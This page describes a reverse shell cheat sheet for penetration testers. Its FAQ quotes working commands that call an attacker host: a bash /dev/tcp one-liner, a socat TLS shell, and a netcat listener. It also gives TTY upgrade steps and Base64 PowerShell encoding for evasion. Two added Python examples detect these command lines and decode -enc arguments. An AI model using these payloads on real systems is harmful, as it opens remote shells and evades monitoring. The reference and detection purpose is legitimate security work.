Reverse Shell Reference
About Reverse Shell Reference
The Reverse Shell Cheat Sheet is a searchable collection of 25 copy-ready reverse shell payloads organized by language and tool. It covers Bash (interactive, read-line, UDP, mkfifo, exec), Python (2, 3, PTY, short one-liner), PHP (exec, proc_open, system, webshell), PowerShell (TCP, Base64, Nishang), and Netcat (with/without -e, ncat SSL, listener setup), plus Perl, Ruby, Java, socat, and TTY shell upgrade techniques.
Designed for penetration testers, red teamers, CTF players, and security researchers who need quick access to reliable reverse shell one-liners during engagements. Each payload includes the exact command syntax with ATTACKER_IP and PORT placeholders ready for substitution.
All content is displayed client-side in your browser with no downloads or accounts required. Supports Korean and English, dark mode, and responsive layouts for use on any device.
Key Features
- 25 reverse shell payloads across 6 categories: Bash, Python, PHP, PowerShell, Netcat, and Other (Perl, Ruby, Java, socat)
- Multiple Bash variants: interactive (-i), read-line, UDP, mkfifo named pipe, and exec file descriptor techniques
- Python payloads for versions 2 and 3, including PTY-spawning shells for full TTY support and compact one-liners
- PHP reverse shells using exec, proc_open, system (mkfifo), and a simple command webshell for web application scenarios
- PowerShell TCP client, Base64-encoded payload for evasion, and Nishang framework integration
- Netcat with and without -e flag, Nmap ncat with SSL encryption, and listener setup commands (nc -lvnp)
- TTY shell upgrade recipes: Python pty.spawn, script /dev/null, stty raw -echo, and TERM export
- Socat encrypted reverse shell with OpenSSL certificate-based TLS for secure communications
Frequently Asked Questions
What reverse shell languages and tools does this cheat sheet cover?
It covers Bash (5 variants including interactive, UDP, mkfifo, exec), Python (versions 2, 3, PTY, short one-liner), PHP (exec, proc_open, system, webshell), PowerShell (TCP, Base64 encoded, Nishang framework), Netcat (with -e, without -e, ncat SSL, listener), and additional tools including Perl, Ruby, Java Runtime, socat with OpenSSL, and TTY shell upgrade techniques -- 25 payloads total.
How do I use a reverse shell payload from this reference?
First, set up a listener on your attacking machine (e.g., nc -lvnp PORT). Then, copy the desired payload, replace ATTACKER_IP with your listener IP address and PORT with your chosen port number, and execute it on the target system. The target will connect back to your listener, giving you an interactive shell.
What is the difference between a reverse shell and a bind shell?
A reverse shell has the target connect back to the attacker's listener, making it effective when the target is behind a firewall that blocks inbound connections. A bind shell opens a listening port on the target that the attacker connects to. Reverse shells are generally preferred in penetration testing because outbound connections are less commonly blocked.
How do I upgrade a basic reverse shell to a fully interactive TTY?
The cheat sheet includes TTY upgrade techniques. Run "python3 -c "import pty; pty.spawn('/bin/bash')"" or "script /dev/null -c bash" to get a PTY. Then press Ctrl+Z to background the shell, run "stty raw -echo; fg" on your local terminal, and run "export TERM=xterm" in the shell. This gives you command history, tab completion, and proper terminal handling.
Which reverse shell should I try first on a Linux target?
Start with the Bash interactive shell (bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1) as it requires no additional tools. If /dev/tcp is not available, try the mkfifo variant with netcat. If Python is installed, the Python 3 PTY shell provides the best interactive experience. Fall back to Perl or Ruby if other interpreters are not available.
How does the socat encrypted reverse shell work?
Socat uses OpenSSL to create a TLS-encrypted tunnel between attacker and target. The attacker runs a listener with a PEM certificate (socat file:`tty`,raw,echo=0 OPENSSL-LISTEN:PORT,cert=cert.pem,verify=0), and the target connects with socat OPENSSL:ATTACKER_IP:PORT,verify=0 EXEC:/bin/bash,pty,stderr,setsid. This encrypts all traffic, making it harder to detect via network monitoring.
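Every command quoted in the answers above leaves a recognisable process command line on the host where it runs, including the socat variant whose network traffic is encrypted. The following is an added example, not part of the original cheat sheet, that matches those command lines in process-creation events; the event fields, rule names, service-parent list and sample events are constructed assumptions.

```python
import re

# Rules keyed to commands quoted on this page; the rule names are this example's own.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "python_pty_spawn": re.compile(r"\bpty\.spawn\s*\("),
    "script_pty": re.compile(r"\bscript\s+/dev/null\s+-c\s+\S+"),
    "socat_exec_shell": re.compile(r"\bsocat\b.*\bEXEC:\S*sh\b", re.I),
}

# Assumed list of service processes that should not be spawning shells.
SERVICE_PARENTS = {"php-fpm", "apache2", "nginx", "java", "node"}


def classify(event):
    """Return (severity, matched rule names) for one process-creation event."""
    hits = [name for name, rx in RULES.items() if rx.search(event["cmdline"])]
    if not hits:
        return "none", hits
    return ("high" if event["parent"] in SERVICE_PARENTS else "medium"), hits


def scan(events):
    """Return (index, severity, rules) for every event that matched a rule."""
    results = []
    for i, event in enumerate(events):
        severity, hits = classify(event)
        if hits:
            results.append((i, severity, hits))
    return results


# Constructed events. Redirections such as ">& /dev/tcp/..." only show up in
# argv when the one-liner is passed to "sh -c", as it is when a service runs it.
SAMPLE_EVENTS = [
    {"parent": "php-fpm",
     "cmdline": 'sh -c "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"'},
    {"parent": "bash",
     "cmdline": "python3 -c \"import pty; pty.spawn('/bin/bash')\""},
    {"parent": "java",
     "cmdline": "socat OPENSSL:192.0.2.10:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid"},
    {"parent": "sshd", "cmdline": "script session.log"},
    {"parent": "nginx", "cmdline": "ls -l /dev/shm"},
]

if __name__ == "__main__":
    for index, severity, rules in scan(SAMPLE_EVENTS):
        print(index, severity, rules)
```

The parent-process check is what separates an operator's own TTY upgrade from a web or application service spawning a shell, which is the case worth paging on.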
What is the PowerShell Base64 payload used for?
The Base64-encoded PowerShell payload helps bypass command-line logging and basic string detection. The actual reverse shell command is encoded in Unicode Base64, then executed with powershell -enc. This is commonly used in Windows environments where security tools monitor command-line arguments for known malicious strings.
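The -enc argument is still present in the recorded process command line, so a defender can decode it (Base64 over UTF-16LE) and match on the cleartext. The following is an added example, not part of the original cheat sheet; the indicator list, function names and sample command line are constructed assumptions.

```python
import base64
import binascii
import re

# Assumed, minimal list of cleartext indicators to look for after decoding.
INDICATORS = re.compile(r"Net\.Sockets\.TCPClient|GetStream\(\)|Invoke-Expression", re.I)


def encoded_arg(cmdline):
    """Return the argument following -enc / -EncodedCommand, or None."""
    tokens = cmdline.split()
    if not tokens:
        return None
    exe = tokens[0].lower()
    if "powershell" not in exe and "pwsh" not in exe:
        return None
    for flag, value in zip(tokens[1:], tokens[2:]):
        name = flag.lstrip("-/").lower()
        # PowerShell accepts any prefix of EncodedCommand, plus the alias -ec.
        if flag[0] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            return value.strip("\"'")
    return None


def decode_encoded_command(cmdline):
    """Decode the encoded script; None if the flag is absent or the data is malformed."""
    arg = encoded_arg(cmdline)
    if arg is None:
        return None
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Return the decoded script and the indicators found in it."""
    text = decode_encoded_command(cmdline)
    hits = sorted({m.group(0).lower() for m in INDICATORS.finditer(text)}) if text else []
    return {"decoded": text, "indicators": hits}


# Constructed sample: a single object-creation fragment, encoded the way -enc expects.
SAMPLE_SCRIPT = "$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10',4444)"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```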
Is this tool intended for authorized security testing only?
Yes. These payloads are provided as a reference for authorized penetration testing, red team engagements, CTF competitions, and security research. Unauthorized access to computer systems is illegal. Always ensure you have explicit written permission before testing any system. This reference helps security professionals work efficiently during legitimate assessments.